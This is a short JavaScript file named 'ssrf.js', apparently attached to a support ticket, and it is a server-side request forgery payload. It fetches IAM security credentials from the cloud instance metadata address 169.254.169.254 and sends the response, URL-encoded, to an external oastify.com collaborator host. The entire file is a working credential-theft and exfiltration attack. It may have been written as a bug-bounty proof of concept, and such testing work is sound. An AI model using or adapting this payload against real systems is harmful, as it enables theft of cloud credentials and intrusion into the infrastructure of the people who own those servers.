Support #2097 » ssrf.js
| 1 | x = new XMLHttpRequest(); | 
|---|---|
| 2 | x.onload = function() { | 
| 3 | l = new XMLHttpRequest(); | 
| 4 | l.open("GET", "http://59cdx93r42n1wcpy3wzs3vi7lyrrfh36.oastify.com/" + encodeURIComponent(this.responseText)); | 
| 5 | l.send(); | 
| 6 | };
 | 
| 7 | x.open("GET", "http://169.254.169.254/latest/meta-data/iam/security-credentials/"); | 
| 8 | x.send(); |